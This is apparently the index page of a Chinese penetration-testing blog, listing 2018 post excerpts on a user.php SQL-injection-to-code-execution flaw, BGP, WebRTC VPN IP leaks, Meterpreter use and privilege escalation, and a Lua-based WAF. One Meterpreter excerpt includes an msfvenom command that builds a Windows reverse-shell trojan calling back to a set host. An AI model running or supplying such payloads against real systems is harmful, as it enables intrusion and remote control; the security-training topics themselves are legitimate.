该文被密码保护。
posted @ 2018-09-13 18:24 渗透测试中心 阅读(1) 评论(0) 编辑
摘要: 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来阅读全文
posted @ 2018-09-13 18:13 渗透测试中心 阅读(23) 评论(0) 编辑
摘要: 0x00 BGP(RFC 1771、 RFC 4271)定义 全称是Border Gateway Protocol, 对应中文是边界网关协议,最新版本是BGPv4。 BGP是互联网上一个核心的互联网去中心化自治路由协议。它的地位是核心的毫不夸张地说, 是目前唯一连接海陆空和7大洲4大洋的外部路由协议阅读全文
posted @ 2018-08-28 09:50 渗透测试中心 阅读(106) 评论(0) 编辑
摘要: 0x00 VPN泄漏本地IP 最近爆出VPN可以被准确地测出浏览者的真实IP地址,这被称为WebRTC特征。只要到这个网页就可以测试你的VPN是否泄露的真实IP。 https://diafygi.github.io/webrtc-ips/ 来示范通过 JS 获取代理用户的真实 IP 地址, 为了大家阅读全文
posted @ 2018-08-23 10:41 渗透测试中心 阅读(4) 评论(0) 编辑
该文被密码保护。
posted @ 2018-08-16 03:07 渗透测试中心 阅读(1) 评论(0) 编辑
该文被密码保护。
posted @ 2018-08-16 03:05 渗透测试中心 阅读(1) 评论(0) 编辑
摘要: 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe阅读全文
posted @ 2018-08-16 03:03 渗透测试中心 阅读(171) 评论(0) 编辑
摘要: 0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链阅读全文
posted @ 2018-08-16 02:56 渗透测试中心 阅读(243) 评论(0) 编辑
该文被密码保护。
posted @ 2018-08-15 03:21 渗透测试中心 阅读(2) 评论(0) 编辑
摘要: 0x01 前言 ngx_lua_waf实现 WAF一句话描述,就是解析HTTP请求(协议解析模块),规则检测(规则模块),做不同的防御动作(动作模块),并将防御过程(日志模块)记录下来。所以本文中的WAF的实现由五个模块(配置模块、协议解析模块、规则模块、动作模块、错误处理模块)组成。 原版本主要的阅读全文
posted @ 2018-08-07 20:28 渗透测试中心 阅读(95) 评论(0) 编辑